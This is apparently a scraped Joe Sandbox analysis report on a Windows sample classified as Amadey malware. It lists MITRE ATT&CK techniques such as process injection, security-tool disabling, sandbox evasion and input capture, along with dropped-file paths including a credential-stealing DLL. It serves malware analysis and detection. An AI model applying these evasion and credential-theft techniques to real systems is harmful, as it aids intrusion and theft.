Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Amadey

Threatname: Amadey

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\nika.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\aKuf.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\clip64[1].dll

C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

C:\Users\user\AppData\Local\Temp\IXP000.TMP\bKug.exe

C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe

C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe

C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe

C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll

C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll

Windows Analysis Report
file.exe

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre